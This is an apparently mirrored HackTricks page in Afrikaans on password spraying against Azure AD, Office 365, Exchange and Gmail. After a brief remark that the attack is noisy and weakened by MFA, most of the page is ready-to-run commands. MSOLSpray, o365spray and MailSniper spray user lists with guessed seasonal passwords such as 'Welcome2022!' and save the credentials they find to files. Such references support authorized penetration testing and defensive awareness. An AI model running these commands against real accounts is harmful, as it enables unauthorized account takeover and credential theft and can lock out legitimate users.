gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-27 07:14:20 -08:00
Code Issues Packages Projects Releases Wiki Activity
Files
44890bfac0931ae480c376ba42a9ce6d9b7547ee
hacktricks-cloud/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md

1.4 KiB
Raw Blame History

Az - Password Spraying

{{#include ../../../banners/hacktricks-training.md}}

Password Spray

In Azure kan dit teen verskillende API eindpunte gedoen word soos Azure AD Graph, Microsoft Graph, Office 365 Reporting webservice, ens.

Let egter daarop dat hierdie tegniek baie luidrugtig is en die Blue Team kan dit maklik vang. Boonop kan gedwonge wagwoord kompleksiteit en die gebruik van MFA hierdie tegniek soort van nutteloos maak.

Jy kan 'n wagwoord spuitaanval uitvoer met MSOLSpray

. .\MSOLSpray\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose

Of met o365spray

python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com

Of met MailSniper

#OWA
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
#EWS
Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt
#Gmail
Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt

{{#include ../../../banners/hacktricks-training.md}}

Reference in New Issue View Git Blame Copy Permalink